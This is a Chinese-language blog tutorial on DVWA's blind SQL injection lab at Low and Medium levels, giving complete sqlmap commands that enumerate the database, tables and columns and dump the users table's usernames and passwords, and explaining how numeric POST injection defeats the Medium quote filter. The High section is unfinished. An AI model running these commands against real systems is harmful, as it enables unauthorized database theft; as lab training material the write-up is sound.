Dvwa靶场-SQL Injection (Blind)-基于sqlmap

一、Low

(1)、获取数据库名

sqlmap -u "你的URL" --cookie="你的Cookie" --current-db --current-user --batch

-u "URL":这个url是你主机里的ip,如果你的靶场在虚拟机,那你就打开虚拟机,找到ip,然后加端口号,和你打开dvwa的sql盲注url差不多,只用改前面一点

--cookie:在dvwa页面--> F12 --> 应用 --> Cookie --> PHPSESSID后面的值

--current-db:获取当前网站所连接的数据库名称。

--current-user:获取当前连接数据库的用户名。

--batch (Automation)自动模式。SQLmap 在运行中会弹出很多确认选项(例如:"是否进行深度测试?")。加上这个参数后,工具将全部选择默认(Yes),实现无人值守的自动化运行。

复制代码
sqlmap -u "http://192.168.136.1:8899/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=2adqjdfiaqk26u1hh84ko162t6; security=low" --current-db --current-user --batch

(2)、获取表名

复制代码
sqlmap -u "http://192.168.136.1:8899/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=2adqjdfiaqk26u1hh84ko162t6; security=low" -D dvwa --tables --batch

-D 参数用来指定你要查看的具体数据库。

--tables获取当前数据库下的表名

(3)、获取列名

复制代码
sqlmap -u "http://192.168.136.1:8899/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=2adqjdfiaqk26u1hh84ko162t6; security=low" -D dvwa -T users --columns --batch

-T 参数用来指定具体的表名

--columns获取指定表的列名

(4)、获取具体数据(脱库)

复制代码
sqlmap -u "http://192.168.136.1:8899/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=2adqjdfiaqk26u1hh84ko162t6; security=low" -D dvwa -T users -C "user,password" --dump --batch

-C 用来指定列名,用逗号隔开。如果不指定 -C,只用 --dump,它会把整张表全部下载下来。

二、Medium

复制代码
sqlmap -u "http://192.168.136.1:8899/vulnerabilities/sqli_blind/" \
--cookie="PHPSESSID=2adqjdfiaqk26u1hh84ko162t6; security=medium" \
--data="id=1&Submit=Submit" \
--current-db --current-user --batch

URL 变化:去掉了 URL 问号后面的参数,因为中级通过 POST 传参。

增加 --data:这是关键。--data="id=1&Submit=Submit" 告诉 sqlmap 模拟表单提交,将数据放在 HTTP 请求体中。

Cookie 级别:确保 security=medium,否则服务器会按照默认或之前的难度处理请求。

中级虽然过滤了单引号,但 id 参数在 SQL 语句中通常是数字型(如 SELECT ... WHERE id = $id)。sqlmap 会自动识别这一点并尝试数字型注入(Numeric-based Injection),这种注入方式根本不需要使用单引号,因此后端的过滤措施在中级难度下对 sqlmap 基本无效。

后面的步骤同Low

三、High

先欠着,有时间想起来这个了,再来完善它,想不起来就算了

相关推荐
卓怡学长7 小时前
w255基于springboot仓库管理系统
java·数据库·spring boot·spring·intellij-idea
J-Tony1110 小时前
【Redis】 Redis 是单线程还是多线程
服务器·数据库·mysql
这个DBA有点耶10 小时前
SQL调优进阶:从“优化一条SQL”到“优化一个系统”的思维升级
java·大数据·数据库·sql·程序人生·dba·改行学it
IvorySQL10 小时前
PG 日报|SQL/PGQ 图查询基于联接重写机制实现
数据库·人工智能·sql·postgresql·区块链·ivorysql
数聚天成DeepSData13 小时前
遥感农业数据集下载全攻略
数据库·人工智能·深度学习·机器学习·自然语言处理·数据挖掘
一勺菠萝丶13 小时前
生产环境平滑升级实战-Nginx维护页数据库迁移与安全回滚
数据库·nginx·安全
心静自然凉80014 小时前
MySQL主从同步配置(一主一从)
数据库
haidy ahmed14 小时前
企微复杂审批流反序列化:动态表单解析引擎与EAV存储模型
数据库·人工智能·自动化·企业微信
Lihua奏14 小时前
MVCC:为什么多人同时读写数据,数据库还能不乱
数据库
9523614 小时前
Redis - 应用
数据库·redis·分布式·缓存